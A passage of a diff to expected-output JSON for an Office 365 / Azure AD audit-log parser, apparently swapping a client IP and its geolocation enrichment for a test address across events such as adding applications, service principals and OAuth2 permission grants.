 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:30:06",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -8932,20 +8824,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -8956,8 +8846,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:30:06.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add OAuth2PermissionGrant.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -8972,7 +8862,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 285605,
+ "log.offset": 285495,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -9001,9 +8891,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:30:06",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -9095,20 +8985,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -9119,8 +9007,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:30:06.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add app role assignment to service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -9135,7 +9023,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 290993,
+ "log.offset": 290881,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -9164,9 +9052,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:30:06",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -9258,20 +9146,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -9282,8 +9168,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:30:06.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add app role assignment to service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -9298,7 +9184,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 296142,
+ "log.offset": 296028,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -9327,9 +9213,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:30:06",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -9421,20 +9307,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -9445,8 +9329,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:30:06.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add app role assignment to service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -9461,7 +9345,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 301291,
+ "log.offset": 301175,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -9490,9 +9374,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:30:06",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -9584,20 +9468,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -9608,8 +9490,8 @@ }, { "@timestamp": "2020-02-10T15:30:06.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add app role assignment to service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -9624,7 +9506,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 306440, + "log.offset": 306322, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -9653,9 +9535,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-10T15:30:06", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9747,20 +9629,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -9771,8 +9651,8 @@ }, { "@timestamp": "2020-02-10T15:30:06.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add app role assignment to service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", 
@@ -9787,7 +9667,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 311589, + "log.offset": 311469, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -9816,9 +9696,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-10T15:30:06", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9910,20 +9790,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -9934,8 +9812,8 @@ }, { "@timestamp": "2020-02-11T16:36:30.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add application.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -9950,7 +9828,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 316738, + "log.offset": 316616, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -9979,9 +9857,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:36:30", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -10063,20 +9941,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -10087,8 +9963,8 @@ }, { "@timestamp": "2020-02-11T16:36:30.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add application.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -10103,7 +9979,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 321131, + "log.offset": 321007, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -10132,9 +10008,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:36:30", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10216,20 +10092,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -10240,8 +10114,8 @@ }, { "@timestamp": "2020-02-11T16:36:30.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add application.", "event.category": "web", "event.code": "AzureActiveDirectory", 
@@ -10256,7 +10130,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 325524, + "log.offset": 325398, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -10285,9 +10159,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:36:30", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10369,20 +10243,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -10393,8 +10265,8 @@ }, { "@timestamp": "2020-02-11T16:36:30.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add application.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -10409,7 +10281,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 329917, + "log.offset": 329789, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -10438,9 +10310,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:36:30", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -10522,20 +10394,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -10546,8 +10416,8 @@ }, { "@timestamp": "2020-02-11T16:36:30.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add owner to application.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -10562,7 +10432,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 334310, + "log.offset": 334180, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -10591,9 +10461,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:36:30", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10677,20 +10547,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -10701,8 +10569,8 @@ }, { "@timestamp": "2020-02-11T16:36:31.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", 
@@ -10717,7 +10585,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 338473, + "log.offset": 338341, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -10746,9 +10614,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:36:31", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10843,20 +10711,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -10867,8 +10733,8 @@ }, { "@timestamp": "2020-02-11T16:36:31.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -10883,7 +10749,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 343183, + "log.offset": 343049, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -10912,9 +10778,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:36:31", 